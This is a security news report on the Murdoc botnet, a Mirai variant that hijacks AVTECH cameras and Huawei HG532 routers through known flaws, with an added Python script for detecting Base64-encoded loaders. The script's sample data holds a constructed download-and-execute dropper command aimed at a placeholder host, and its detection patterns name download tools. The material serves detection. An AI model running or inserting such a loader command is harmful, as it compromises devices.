Murdoc Botnet Uses Over 100 Distinct C2 Servers to Manage Infected Devices

A new Mirai variant is exploiting vulnerabilities in IP cameras and broadband routers to compromise the devices, download payloads and fold them into an expanding botnet.
The Qualys Threat Research Unit uncovered "a large-scale, ongoing operation," dubbed the Murdoc Botnet, that exploits known vulnerabilities, including CVE-2024-7029 and CVE-2017-17215, to take over AVTECH cameras and Huawei HG532 routers.
The malware is delivered through shell scripts and ELF binaries. Compromised devices check in to a command-and-control network, from which the attackers orchestrate distributed denial-of-service attacks.
Qualys has tracked over 1,300 active IP addresses linked to Murdoc since its emergence in July 2024. The botnet primarily targets Internet of Things devices used by consumers and small-to-medium businesses.
AVTECH is a Taiwanese manufacturer known for producing surveillance systems, including network cameras and DVRs, widely used for video security. Their products are commonly deployed in small businesses, residential setups, retail outlets and public facilities.
Censys in September 2024 observed 37,995 AVTECH cameras exposed to the internet, at a time when the operators of another botnet were also targeting CVE-2024-7029. That botnet was the Mirai variant Corona, of which Murdoc is itself a variant.
The vulnerability enables command injection through the brightness function in the CGI script at /cgi-bin/supervisor/Factory.cgi, Censys said. Because the flaw is reachable through the camera's web interface, any camera whose management interface is exposed to the internet is within reach of the botnet's scanners.
Murdoc's loaders use embedded Base64-encoded commands to download and execute payloads. The encoding hides the download-and-execute commands from simple inspection, and the same scripts remove their own traces after infection, which complicates detection and mitigation.
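One way to surface this pattern in process or honeypot telemetry, as an added detection example that is not code from the original article or from Qualys: pull Base64 tokens out of captured shell command lines, decode them, follow double-encoded layers, and tag the decoded text for download, execute, cleanup and staging behaviour. The sample log lines, host names and the loader.invalid URL are constructed for the example and are not real Murdoc infrastructure.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional

# A Base64 run long enough to be worth decoding; short tokens are mostly noise.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Behaviour tags for decoded text. "download" + "execute" is the loader signature;
# "cleanup" and "staging" raise confidence but are not required.
INDICATORS = {
    "download": re.compile(r"\b(wget|curl|tftp|ftpget)\b"),
    "execute": re.compile(r"(chmod\s+[+0-7]\S*|\bsh\s+\S+|\./\S+)"),
    "cleanup": re.compile(r"(rm\s+-r?f|history\s+-c|>\s*/dev/null)"),
    "staging": re.compile(r"\bcd\s+/(tmp|var/run|dev/shm|mnt)\b"),
}


@dataclass
class Finding:
    line_no: int      # 1-based index of the log line the token came from
    depth: int        # 1 = decoded once, 2 = decoded from a decoded token, ...
    decoded: str      # the decoded text
    tags: List[str]   # INDICATORS that matched the decoded text


def try_decode(token: str) -> Optional[str]:
    """Decode a Base64 token to printable ASCII, or None if it is not text."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    if not all(c.isprintable() or c in "\r\n\t" for c in text):
        return None
    return text


def scan_text(text: str, line_no: int, depth: int = 0, max_depth: int = 3) -> List[Finding]:
    """Find Base64 tokens in text, decode them and tag the result.

    Recurses into each decoded string so that payloads wrapped in a second
    layer of Base64 (echo X | base64 -d | base64 -d | sh) are still caught.
    max_depth bounds the recursion so a hostile input cannot make this loop.
    """
    findings: List[Finding] = []
    if depth >= max_depth:
        return findings
    for match in B64_TOKEN.finditer(text):
        decoded = try_decode(match.group(0))
        if decoded is None:
            continue
        tags = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        findings.append(Finding(line_no, depth + 1, decoded, tags))
        findings.extend(scan_text(decoded, line_no, depth + 1, max_depth))
    return findings


def scan_log(lines: List[str]) -> List[Finding]:
    """Run scan_text over every line of a log, numbering lines from 1."""
    out: List[Finding] = []
    for i, line in enumerate(lines, 1):
        out.extend(scan_text(line, i))
    return out


def is_loader(finding: Finding) -> bool:
    """Download plus execute in one decoded blob is the loader signature."""
    return {"download", "execute"} <= set(finding.tags)


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed stage-one loader text, typical of Mirai-style droppers (hypothetical URL).
STAGE1 = "cd /tmp; wget http://loader.invalid/bins/x.sh; chmod +x x.sh; sh x.sh; rm -f x.sh"

# Constructed exec telemetry lines; hosts and commands are made up for this example.
SAMPLE_LOG = [
    'cam-01 exec: sh -c "echo %s | base64 -d | sh"' % _b64(STAGE1),
    'cam-02 exec: sh -c "ls -la /var/www"',
    'rtr-03 exec: sh -c "echo %s | base64 -d | base64 -d | sh"' % _b64(_b64(STAGE1)),
    'cam-04 exec: sh -c "echo %s | base64 -d"' % _b64("uptime; free -m; cat /proc/cpuinfo"),
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        verdict = "LOADER" if is_loader(f) else "benign"
        print(f"line {f.line_no} depth {f.depth} {verdict:6} tags={f.tags} :: {f.decoded[:60]}")
```

Only the decoded text is tagged, so a long Base64 blob that decodes to binary, or to an innocuous command as on line 4, is reported but not flagged as a loader; the double-encoded line 3 is caught at depth 2, which is why the recursion matters.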
The other vulnerability, CVE-2017-17215, is a remote code execution flaw in the Huawei HG532 disclosed in 2017: an authenticated attacker who can send malicious packets to port 37215 on the router can execute arbitrary code on it.
Huawei HG532 is a consumer-grade broadband router primarily used for home internet connections. These routers are often distributed by internet service providers as part of their service packages. They are popular in Asia, Africa and parts of Europe due to their affordability and support for ADSL2+ broadband services.
The campaign uses over 100 distinct C2 servers to manage infected devices and distribute malware. The servers host the payloads, letting the attackers maintain a persistent presence on victims and run large-scale operations.
Researchers identified over 500 malware samples whose infection mechanisms rely on outdated firmware and weak security configurations on the targeted devices.
Murdoc Botnet’s global victim list includes devices located in Malaysia, Thailand, Mexico and Indonesia.